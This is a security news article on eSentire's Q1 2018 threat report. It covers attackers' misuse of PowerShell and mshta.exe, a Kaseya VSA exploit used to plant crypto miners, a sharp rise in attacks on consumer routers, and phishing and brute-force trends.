91% of critical incidents involve known, legitimate binaries like PowerShell

New WAF attack timelines show the start and end of a threat.
No more logs. See how →

Opportunistic threat actors are leveraging trusted tools, like PowerShell, to retrieve and execute malicious code from remote sources. According to eSentire, 91% of endpoint incidents detected in Q1 2018 involved known, legitimate binaries, such as PowerShell or mshta.exe.

incidents legitimate binaries

Quarter over quarter change in threat type volume

“eSentire Threat Intelligence data shows heavy use of legitimate Microsoft binaries, such as PowerShell and mshta.exe, popular tools for downloading and executing malicious code in the initial stages of a malware infection,” said Eldon Sprickerhoff, chief security strategist, eSentire. “PowerShell can also be leveraged by adversaries to reduce their on-disk footprint and evade detective controls by operating in memory and obfuscating command-line parameters.”

In late January 2018, an eSentire advanced threat analytics operation, detected an adversary leveraging an unknown exploit in Kaseya’s Virtual System Administrator (VSA) product to deploy crypto miners across the infrastructure of a small number of eSentire customers. The attack broadly targeted the trusted system of MSPs and cloud platforms through Kaseya VSA endpoint agents for initial access to deliver malicious scripts. eSentire discovered the threat and notified Kaseya of the intrusions, resulting in multiple security fixes.

539% increase in consumer-grade router attacks

The report also indicates a dramatic increase in attacks targeting popular consumer-grade routers, like Netgear and Linksys (both of whom own a significant share of the consumer network device market, at 51% and 26% respectively), – researchers saw a 539% increase from Q4 2017 to Q1 2018.

Trending in router exploitations was first observed in late 2017 when the Reaper Botnet gained media attention. Additionally, intrusion attempts across industries grew 36%, mostly due to DNS manipulation in consumer-grade routers. These manipulations allow attackers to redirect victims to malicious infrastructure to achieve a variety of results, including malware and phishing landing pages. Other exploits focused on consumer-grade routers.

“The increase in attacks against consumer network devices can be attributed to the perceived value in recruiting devices for attacks against businesses, as opposed to leveraging them as potential network entry-points,” said Sprickerhoff.

incidents legitimate binaries

Attempted credentials on the eSentire honeypot

Additional findings

  • Phishing rose 39% across industries, with DocuSign, Office 365, and OneDrive as the most popular lures. Office 365 showed the highest success rate and popularity, growing 5x over 2017 despite DocuSign being the most popular lure used.
  • Education, retail, biotechnology, construction, and non-profit organizations saw the greatest rise in exploit attempts due to a high degree of consumer-grade router exploit attempts, brute forcing, and web server exploit attempts.
  • Most brute force attacks originated from infrastructure based in China, followed by the United States, Germany, and Russia.
  • Malicious code (+35%) and phishing (+39%) saw increases in the first quarter of 2018 with malicious code incidents continuing to favor email as a delivery vector.

“While industry sentiment is focused on the ever-changing threat landscape, the data suggests that it’s the cybercriminal landscape that’s shifting. As we continue to see successful efforts in disrupting malicious infrastructure and comprehensive threat blocking, cybercriminals are forced to diversify their hacking methods. They’re pivoting to use new methods for sustaining infrastructure,” said Sprickerhoff. “Technology is changing rapidly, and as it does, attackers are shifting their techniques to match. The increase in router-based attacks is a prime example.”

Are you protecting your users and sensitive O365 data from being leaked? Learn how Specops Authentication for O365 can help.